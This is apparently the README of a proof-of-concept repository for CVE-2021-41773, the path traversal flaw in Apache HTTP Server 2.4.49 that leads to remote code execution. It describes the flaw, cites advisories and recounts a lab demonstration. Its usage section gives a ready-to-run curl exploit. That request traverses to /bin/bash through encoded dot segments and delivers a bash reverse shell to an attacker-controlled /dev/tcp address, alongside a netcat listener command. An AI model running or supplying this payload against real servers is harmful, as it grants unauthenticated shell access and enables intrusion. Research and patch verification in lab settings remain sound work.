# CVE-2021-41773 – Apache HTTP Server 2.4.49 Remote Code Execution
> ⚠️ **Disclaimer**
This repository is intended **strictly for educational and research purposes only**.
The information and code provided here can be used in **controlled environments**, such as private lab machines.
**Unauthorized use of this code against systems you do not own or have explicit permission to test is illegal and unethical.**
The author is **not responsible** for any misuse or damages caused.
---
## 🔍 About the Vulnerability
**CVE-2021-41773** affects **Apache HTTP Server version 2.4.49**.
Due to improper input validation in path normalization, an attacker can exploit **path traversal** using encoded characters like `%2e` to access arbitrary files.
If **CGI is enabled**, this vulnerability can be escalated to **unauthenticated remote code execution (RCE)**.
- **Vulnerability Type:** Path Traversal to Remote Code Execution
- **Affected Version:** Apache 2.4.49
- **Authentication Required:** ❌ No
- **Severity:** Critical
- **CVSS Score:** 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
---
## 🧾 References
- [Apache Security Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)
- [Exploit-DB – 50383](https://www.exploit-db.com/exploits/50383)
- [GitHub PoC](https://github.com/battleoverflow/apache-traversal)
- [NVD CVE Report](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)
---
## 🛠 Exploit Overview
A malicious `curl` request is crafted to exploit the path traversal flaw. When CGI is enabled, attackers can reach `/bin/bash` and run arbitrary shell commands.
In this example, a **reverse shell payload** is sent to gain shell access from the server.
---
## 💥 Demonstration
This exploit was tested in a **private lab environment**. Below are the steps and outcomes.
### 1. Detecting Apache Version
An Nmap scan identified the target running Apache/2.4.49.
---
### 2. Exploit Execution
A reverse shell payload was delivered using a crafted curl command.
---
### 3. Reverse Shell Received
A reverse shell was successfully obtained on the attacker's listener.
---
## 📂 Exploit Usage
**Step 1: Start Netcat Listener**
```bash
nc -nvlp 4444
```
**Step 1: Run Exploit**
```bash
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'
```
### ✔️ Ensure:
Apache version is 2.4.49
CGI is enabled
Port 4444 (or your chosen port) is open through the firewall
## 📖 Medium Blog
Check out the detailed walkthrough and theory on my Medium post:
👉 [Read the blog on Medium](https://medium.com/cyberquestor/️-cve-2021-41773-exploiting-apache-2-4-49-path-traversal-to-remote-code-execution-rce-2ab23c5837cd)
[4.0K] /data/pocs/4468d48464791ea8521e232fb178afed2b753507
├── [4.0K] img
│ ├── [180K] apache-version.png
│ ├── [222K] exploit-command.png
│ └── [ 56K] reverse-shell.png
└── [2.9K] README.md
1 directory, 4 files